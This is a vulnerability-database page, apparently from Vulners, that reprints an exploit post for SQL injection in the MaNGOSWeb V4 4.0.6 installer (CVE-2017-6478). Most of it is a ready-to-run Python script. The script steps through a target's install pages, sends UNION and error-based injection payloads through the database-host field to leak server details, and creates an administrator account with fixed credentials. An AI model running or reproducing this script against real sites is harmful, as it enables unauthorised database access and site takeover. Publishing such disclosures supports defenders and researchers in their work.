Vulners
Lucene search
📄 MaNGOSWeb 4.0.6 SQL Injection
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2017-6478 | 4 Dec 202521:02 | – | circl |
 | CVE-2017-6478 | 5 Mar 201720:00 | – | cve |
 | CVE-2017-6478 | 5 Mar 201720:00 | – | cvelist |
 | MaNGOSWebV4 4.0.6 - Reflected XSS | 3 Dec 202500:00 | – | exploitdb |
 | EUVD-2017-15535 | 7 Oct 202500:30 | – | euvd |
 | MaNGOSWebV4 < 4.0.8 - Cross-Site Scripting | 23 Jun 202605:08 | – | nuclei |
 | CVE-2017-6478 | 5 Mar 201720:59 | – | nvd |
 | CVE-2017-6478 | 5 Mar 201720:59 | – | osv |
 | 📄 MaNGOSWebV4 4.0.6 Cross Site Scripting | 4 Dec 202500:00 | – | packetstorm |
| 📄 MaNGOSWeb 4.0.6 Host Header Injection / XML Injection | 27 Jan 202600:00 | – | packetstorm |
10
=============================================================================================================================================
| # Title : MaNGOSWeb V4 4.0.6 Sql Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/install/index.php |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212429/ & CVE-2017-6478
[+] Summary : MaNGOSWebV4 version 4.0.6 suffers from a Sql injection vulnerability.
[+] POC :
#!/usr/bin/env python3
"""
Usage: python3 poc.py https://target.com
"""
import requests
import sys
import warnings
from urllib3.exceptions import InsecureRequestWarning
# Suppress SSL warnings
warnings.filterwarnings('ignore', category=InsecureRequestWarning)
def exploit_sqli(target_url):
"""Exploit SQL injection to steal database data"""
# Create session with SSL verification disabled
session = requests.Session()
session.verify = False # Disable SSL verification
try:
# Step 1: Access installer
session.get(f"{target_url}/install/index.php?step=1")
# Step 2
session.get(f"{target_url}/install/index.php?step=2")
# Step 3
session.get(f"{target_url}/install/index.php?step=3")
# Exploitation in Step 4
payload = {
'db_host': "localhost' UNION SELECT version(),user(),database(),@@datadir,'injected'-- -",
'db_port': '3306',
'db_username': 'root',
'db_password': 'test',
'db_name': 'realmd'
}
response = session.post(f"{target_url}/install/index.php?step=4", data=payload)
# Extract information from error message
if "MySql error log" in response.text:
start = response.text.find("MySql error log:<br />") + 22
end = response.text.find("</div>", start)
error_msg = response.text[start:end]
print("[+] Database information leaked:")
print(f" {error_msg}")
return True
except requests.exceptions.SSLError as e:
print(f"[!] SSL Error: {e}")
print("[*] Trying with verify=False...")
return False
except Exception as e:
print(f"[!] Error: {e}")
return False
return False
def create_admin_account(target_url, username, password):
"""Create admin account remotely"""
session = requests.Session()
session.verify = False # Disable SSL verification
try:
# Navigate through steps
for step in range(1, 6):
session.get(f"{target_url}/install/index.php?step={step}")
# Step 5 data
step5_data = {
'char_db_host': 'localhost',
'char_db_port': '3306',
'char_db_username': 'mangos',
'char_db_password': 'mangos',
'char_db_name': 'characters',
'w_db_host': 'localhost',
'w_db_port': '3306',
'w_db_username': 'mangos',
'w_db_password': 'mangos',
'w_db_name': 'world',
'db_host': 'localhost',
'db_port': '3306',
'db_name': 'realmd',
'db_username': 'mangos',
'db_password': 'mangos'
}
session.post(f"{target_url}/install/index.php?step=5", data=step5_data)
# Create account in Step 6
step6_data = {
'account': username,
'pass': password,
'pass2': password
}
response = session.post(f"{target_url}/install/index.php?step=6", data=step6_data)
if "Congradulations" in response.text or "Congratulations" in response.text:
print(f"[+] Admin account created:")
print(f" Username: {username}")
print(f" Password: {password}")
return True
except Exception as e:
print(f"[!] Error creating account: {e}")
return False
return False
def simple_sql_injection_test(target_url):
"""Simple SQL injection test with timeout handling"""
print(f"[*] Testing SQL Injection on {target_url}")
# Test different payloads
payloads = [
("Basic Injection", "localhost' OR '1'='1"),
("Union Injection", "localhost' UNION SELECT 1,2,3,4,5-- -"),
("Error Based", "localhost' AND 1=CONVERT(int, @@version)-- -"),
]
session = requests.Session()
session.verify = False
session.timeout = 10
for payload_name, payload in payloads:
try:
data = {
'db_host': payload,
'db_port': '3306',
'db_username': 'root',
'db_password': 'test',
'db_name': 'realmd'
}
response = session.post(f"{target_url}/install/index.php?step=4",
data=data,
timeout=10)
if "error" in response.text.lower() or "mysql" in response.text.lower():
print(f"[+] Possible SQL Injection with {payload_name}")
return True
except requests.exceptions.Timeout:
print(f"[!] Timeout with {payload_name}")
except Exception as e:
print(f"[!] Error with {payload_name}: {e}")
return False
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_url>")
print(f"Example: {sys.argv[0]} http://localhost/mangosweb")
print(f"Example: {sys.argv[0]} https://127.0.0.1")
sys.exit(1)
target = sys.argv[1]
# Add http:// if not present
if not target.startswith(('http://', 'https://')):
target = 'http://' + target
print(f"[*] Targeting: {target}")
print(f"[*] SSL Verification: DISABLED")
# Test SQL injection
if simple_sql_injection_test(target):
print("[+] SQL Injection vulnerability detected!")
else:
print("[-] No SQL Injection detected")
# Try to exploit SQL injection
print("\n[*] Attempting SQL Injection exploitation...")
if exploit_sqli(target):
print("[+] SQL Injection exploited successfully")
else:
print("[-] SQL Injection exploitation failed")
# Try to create admin account
print("\n[*] Attempting to create admin account...")
if create_admin_account(target, "admin", "Admin123!"):
print("[+] Admin account created successfully")
else:
print("[-] Failed to create admin account")
print("\n[*] Attack completed")
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jan 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 24.3
CVSS 3.16.1
EPSS0.02574